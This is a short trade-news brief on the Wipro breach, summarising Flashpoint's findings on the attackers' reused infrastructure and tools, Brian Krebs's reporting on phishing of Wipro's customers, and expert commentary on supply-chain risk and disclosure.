Dive Brief:
- The hack on Indian outsourcing and consulting company Wipro involved actors linked to other attacks dating back to 2017 and potentially 2015, and "the re-use of infrastructure from those older attacks," according to research done by Flashpoint.
- The intruders used ScreenConnect, a remote access software application for desktops, on Wipro's machines and domains that were hosting powerkatz and powersploit scripts, according to Flashpoint. Powerkatz is used for searching memory for credentials or other authentication keys whereas powersploit is used "during penetration-testing engagements to launch exploits at a target."
- Last month security journalist Brian Krebs reported Wipro's breach enabled intruders to launch phishing schemes against "at least a dozen" of the company's customers. Wirpo's customers tracked the "suspicious network renaissance activity" to partner systems that were in direct communication with Wipro's network.
Dive Insight:
The best hacks are the ones that go for a slow bleed. It's common to hear about hacks that live in systems for months, if not years.
Equifax's breach was the product of a bug that was left unpatched for months before it was finally exploited. Marriot's breach was the result of an intrusion that occurred in 2014, two years before it acquired the company with the exploited systems.
Bad actors that slip into a network unnoticed follow "surprisingly detailed blueprints" of the enterprise they're hacking, Mark Bower, GM and CRO at Egress Software, told CIO Dive, but the access point usually starts with human error, like falling for phishing. Finding a weak link in the communication chain to steal credentials and then access, take over process and "map out weak points" is the traditional pattern of hackers.
Wipro's breach undermines the supply chain and its ability to securely partner with companies. Disclosing the intrusion to the impacted parties is one of the first steps an exploited company should take, according to Bower. "The worst case scenario is triggering another attack because supply chain risk details weren't shared securely with trust."
Wipro launched an investigation after learning of the "coordinated and advanced phishing campaign" targeting its customers," according to an Wipro statement emailed to CIO Dive. "We have engaged an independent forensic firm to assist us in the investigation."